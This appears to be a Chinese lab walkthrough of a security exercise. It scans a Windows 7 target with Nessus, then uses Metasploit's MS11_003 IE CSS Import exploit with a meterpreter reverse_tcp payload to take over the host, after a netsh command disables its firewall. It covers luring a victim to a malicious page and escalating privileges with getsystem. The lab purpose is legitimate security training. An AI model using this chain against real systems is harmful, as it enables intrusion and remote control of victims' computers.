1.查看win7漏洞主機的登錄用戶及網絡配置信息,從下圖2可以看出漏洞主機IP為10.1.1.129。使用命令如下:
ipconfig???查看網絡配置信息
?
?
?
2.為了更好的演示攻擊win7系統實例需要關閉win7系統的防火墻,win+R輸入cmd,運行“netsh firewall set opmode mode=disable”命令
?
?
?
3.查看攻擊者主機登陸用戶及網絡配置信息,從下圖3可以看出攻擊主機登陸用戶為root ,IP為10.1.1.128
whoami????查看當前登陸用戶
ifconfig????查看網絡配置信息
?
?
?
?
?
?
?
- 在Nessus官網下載頁面選擇適合Kali linux的安裝程序。經實驗證明多個版本的都可以在kali linux上安裝成功,這里選擇“Debian 6,7,8,9/Kali Linux 1,2017.3 AMD64”版本程序。下載之后,拷貝到Kali linux主機上,運行下列命令進行安裝即可。
?
?
利用Nessus掃描目標主機
執(zhí)行命令 /etc/init.d/nessusd start 啟動Nessus服務
?
?
?
訪問Nessus控制端https://127.0.0.1:8834/。輸入安裝時設置的賬號信息(密碼在桌面nessus文件夾內)密碼是heetian
?
新建一個掃描,依次選擇“New Scan”-“Basic Network Scan”,如下圖所示。
配置掃描信息,主要設置掃描名稱、描述和掃描目標三個信息即可,其他配置選擇默認,配置完成點擊Save。選擇對整個10.1.1.0/24網段進行掃描?選擇別的時間過長。
?
?
?
?
重點關注10.1.1.129主機,即win7靶機,Nessus掃描出該主機存在四個最高危漏洞、2個高危漏洞及其它漏洞問題。
?
?
?
?
?
?
選中高危漏洞,Nessus給出了該漏洞的介紹、風險信息、解決方案等詳細信息。Risk information對于攻擊者來說非常有用,可以根據Risk information去Google搜索是否存在已知的漏洞利用Exp。
?
?
?
?
?
?
利用MS11_003 IE漏洞攻擊win7主機
步驟二中掃描得到win7主機系統存在MS11_030解析漏洞,但是該漏洞利用條件較為苛刻,因此選擇MS11_003 IE CSS Import漏洞來演示如何通過誘騙攻擊者點擊我們精心構造的含有攻擊代碼的網頁來實現系統入侵。
?
- 在kali中執(zhí)行“msfconsole”,啟動metasploit
?
?
?
- 運行命令:“use exploit/windows/browser/ms11_003_ie_css_import”選擇漏洞利用EXP
?
?
?
?
- 運行命令:show options,查看配置選項
?
?
?
?
4.設置生成的惡意網頁的URI為baidu.com
運行命令:set URIPATH baidu.com
5.為防止服務器端口沖突,設置服務器端口為8060,避開常用端口8080
運行命令:set SRVPORT 8060
6.設置攻擊負載
運行命令:set PAYLOAD windows/meterpreter/reverse_tcp
?
?
?
?
7.查看配置選項
運行命令: show options
?
8.設置LHOST以綁定本地IP
set LHOST 10.1.1.128
?http://10.1.1.128:8060/baidu.com
?
9.為避免沖突設置LPORT
運行命令:set LPORT 8866
?
10.運行命令“exploit”開始進行攻擊,生成惡意網頁和做好其他準備,只等受害者訪問我們構造的惡意網頁
?
?
?
11.在 Win7靶機打開IE,訪問http://10.1.1.128:8060/baidu.com,模擬受害者誤點擊網頁,靶機IE如下圖所示,攻擊者Metasploit顯示如下圖所示信息表明攻擊成功。
?
?
?
?
?
?
12.驗證攻擊是否成功。列出當前成功建立的回話,任意進入一個回話,查看攻擊者的身份??梢試L試使用getsystem進行進一步的提權,如果提權失敗則可以采取上傳提權exe程序進行提權的方案獲得最高權限。
sessions???列出所有會話
sessions -i 1???進入1號會話
getuid???查看當前用戶
?
?
?
?
?
?
?
?
四、思考與補充
1.?使用Armitage攻擊目標主機。
這種方法一般會經歷目標網絡掃描、目標主機信息搜集、目標主機攻擊模塊搜索三個階段。目標網絡掃描是為了確定目標主機所在網絡結構的網絡拓撲,為后續(xù)目標主機信息搜索和攻擊奠定基礎。目標主機信息搜索是為了收集目標主機的漏洞信息,根據收集到的漏洞信息可以利用Armitage在Metasploit中自動搜索合適的攻擊模塊。目標主機攻擊模塊搜索主要方法是依據發(fā)現的漏洞信息尋找可以突破目標系統的現有漏洞利用模塊,為具體的攻擊方案制定提供盡可能多的可靠支撐。
五、思考與總結
通過這個實驗,可以了解到Nessus漏洞掃描工具的一些基礎功能,還可以掌握如何掃描主機漏洞,利用Nessus篩選合適的Metasploit攻擊模塊進行安全測試。
本文摘自 :https://www.cnblogs.com/